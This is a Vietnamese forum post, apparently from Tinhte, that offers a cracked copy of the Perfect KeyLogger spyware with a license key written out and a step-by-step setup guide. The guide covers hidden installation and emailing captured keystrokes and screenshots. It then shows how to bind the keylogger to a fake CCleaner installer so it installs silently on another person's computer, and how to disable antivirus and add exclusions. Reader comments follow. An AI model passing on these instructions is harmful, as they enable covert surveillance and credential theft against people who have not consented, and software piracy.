Tải Perfect KeyLogger 1.68 Tiếng Việt - Theo dõi máy tính
yoyonguyenvn
3 năm trướcBình luận: 9Lượt xem: 56.313
Download Tải Perfect KeyLogger 1.68 Tiếng Việt - Phần mềm theo dõi giám sát máy tính

Keylogger có thể giám sát theo dõi con cái, người thân xem họ làm gì với PC, với internet, khi chat với người lạ. Keylogger có thể chụp lại màn hình máy tính, lịch sử web, các thao tác gõ bàn phím của người bị theo dõi

Perfect KeyLogger là phần mềm quen thuộc giúp bạn theo dõi máy tính, chụp bàn phím, màn hình, thư mục tạm thời

Gói tải về giải nén gồm file setup, key và Việt.
Link Download Perfect KeyLogger 1.68 Tiếng Viết
Tải Về Máy

Trước tiên bạn chạy file Setup, nó sẽ bắt bạn nhập chữ 'open' vào để cài.

sau đó bấm Next, Yes, Next, Next, tới màn hình kế:
nhập key đăng ký:
usename: ptk911
key: WGAF-AYBT-UYDG-DPVD
(hoặc lấy từ key trong gói tải về)

Bạn chọn nơi lưu file cài đặt, có thể chọn ở nơi nào khác bí mật tùy bạn. Và chọn kiểu cài đặt bình thường hoặc cài đặt ngầm. Màn hình kế nữa là chọn có thêm vào menu Start hoặc tạo thư mục ảo.
Sau khi cài xong sẽ xuất hiện 1 icon ở khay hệ thống, bấm chuột phải và chọn Exit.

Bây giờ chạy file Viet, sau đó bấm Ctrl+Alt+L (hoặc vào Start/Run gõ lệnh bpk) để chạy lại Perfect KeyLogger, bấm chuột phải vào icon, đã có tiếng Việt.
Vào 'Cài đặt':
Ở thẻ 'Chung' và 'Ghi chép' nên đánh dấu chọn hết:

và nên tạo Mật khẩu để không cho người khác truy cập chương trình:

Ở thẻ 'Chụp màn hình' mục Chất lượng ảnh nên chọn vừa phải để không tốn dung lượng.

Vậy là xong, kể từ giờ, bạn có thể theo dõi giám sát PC của mình (xem những người dùng chung máy tính làm gì). Muốn xem thì chọn mục 'Xem Ghi chép' trên cùng.

Nếu bạn muốn gửi thông tin ghi chép từ máy tính của mình (hoặc của máy khác đã bị cài Perfect KeyLogger) qua mail để giám sát, thì chuyển qua thẻ quan trọng nhất, thẻ 'Email':

thẻ "Tiến trình' các bạn tùy chỉnh, ở đây mình chọn gửi mỗi 30 phút.
thẻ 'Gửi tới':
Thẻ này không phải dễ chọn, trên mạng hướng dẫn rất nhiều các bạn xem thêm
mình chỉ hướng dẫn cách tìm SMTP hiện tại cho Gmail, Yahoo

Vào Start/Run, gõ lệnh nslookup
hiện bảng cmd, gõ tiếp set type=mx
tiếp theo gõ máy chủ bạn dùng như gmail.com, yahoo.com
như bạn thấy trong hình, đã có SMTP của các máy chủ:
- gmail:
alt1.gmail-smtp-in.1.google.com
alt2.gmail-smtp-in.1.google.com
alt3.gmail-smtp-in.1.google.com
alt4.gmail-smtp-in.1.google.com
gmail-smtp-in.1.google.com
- yahoo.com:
mta5.am0.yahoodns.net
mta6.am0.yahoodns.net
mta7.am0.yahoodns.net
- yahoo.com.vn:
mx-apac.mail.gm0.yahoodns.net

bạn nhập vào mục Máy chủ SMTP
gửi tới thì ghi email của bạn
cổng thì ghi 465 hoặc 587 cho gmail, 465 hoặc 25 cho yahoo
Sau đó bấm 'Gửi thử', nếu có thông báo xác nhận thành công là OK.
(Phần này mình chưa thử nên chưa biết sao, các bạn xem thêm trên mạng hường dẫn rất nhiều, có cả cách đăng ký với aol.com)
Nếu muốn lén lút cài vào máy người khác thông qua 1 pm trung gian thì vào "Cài đặt từ xa':
bấm 'Next' và chọn như trong hình

Bây giờ mới kiếm 1 chương trình nào đó để cho thằng này kí sinh vào, nhằm cài đặt vào máy khác. Ở đây mình thử chọn CCleaner.

chọn icon thì lấy ngay icon của CCleaner luôn

bấm 'Next' là xong, nó tạo cho bạn file setup tên là inst_xxxxx.exe, bạn muốn đổi lại tên gì tùy ý. Và bạn có thể up share file này cho người cần theo dõi. Chỉ cần người đó bấm vào là khi cài đặt, Perfect KeyLogger cũng âm thầm cài theo và tự động gửi mail file ghi chép cho bạn.

PM này trang chủ lưu ý các antivirus có thể xem là trojan, nên tắt Antivirus trước khi cài đặt, cấu hình. Khi nào xong mở lại antivirus và cho nó vào danh sách loại trừ của antivirus (thư mục chính mặc định chứa chương trình là C:\Program Files\BPK với win 32 và C:\Program Files (x86)\BPK với win 64, nếu bạn không chọn nơi lưu khác khi cài đặt).
Tiếng Việt hiển thị chỉ có 1 vài chỗ bị lỗi font, nếu các bạn muốn tốt hoàn toàn thì cần cài thêm Môi trường tiếng Việt cho Windows. Tải thêm file ở dưới. Bấm đúp vào nó là xong. Khởi động máy lại là đã có tiếng Việt tốt. Chỉ cần thực hiện 1 lần duy nhất là các pm khác tiếng Việt cũng OK luôn.
Cài xong quên mất mật khẩu đăng nhập , giờ phải làm sao ?
Mình không gửi keylog muốn giám sát máy tính ở nhà, mình không cài đoạn email nhưng khi xem ghi chép thì không hiện gì luôn
Bác thớt cho em hỏi, máy em cài đặt email và smtp server như bác bảo mà nó báo lỗi: Kích hoạt kết nối tới máy chủ? là bị làm sao ạ 😔 Bác giúp em với
@Hoang_Jemin bản này không dùng được nữa, tui cũng bị vậy.
Actua keyloger 3.2 thì cấu hình aol thì được, nhưng lại không có cho gửi file chụp màn hình.
Có bác nào làm thử với gmail được chưa ạ? xin hướng dẫn. Tôi làm thử với FTP cũng ko ổn, đăng ký tài khoản trên drivehq nhưng cũng bị chặn rồi. có cách nào khác không ạ?
Thanks.
Cho hỏi mình cài trên Win 10 ok hết rồi, đến khi mình cick vào ẩn Icon xọng Bấm Ctrl+Alt+K mà ko thấy nó ra, mình thử xóa đi làm lại mấy lần rồi mà vận bị như vậy?
@Mymyvm Mình cũng bị vậy, bạn có tìm ra cách fix chưa chỉ mình với nhé
Cái này nguy hiểm quá!

Tải app Tinh tế

Tải app Tinhte - Theo dõi thông tin mà bạn yêu thích

Tải app TinhteTải app Tinhte
Tải app Tinh tế cho Android trên Google PlayTải app Tinh tế cho iPhone, iPad trên App Store
  • Chịu trách nhiệm nội dung: Trần Mạnh Hiệp
  • © 2020 Công ty Cổ phần MXH Tinh Tế
  • Địa chỉ: 209 Đường Nam Kỳ Khởi Nghĩa, Phường 7, Quận 3, TP.HCM
  • Số điện thoại: 02862713156
  • MST: 0313255119
  • Giấy phép thiết lập MXH số 11/GP-BTTTT, Ký ngày: 08/01/2019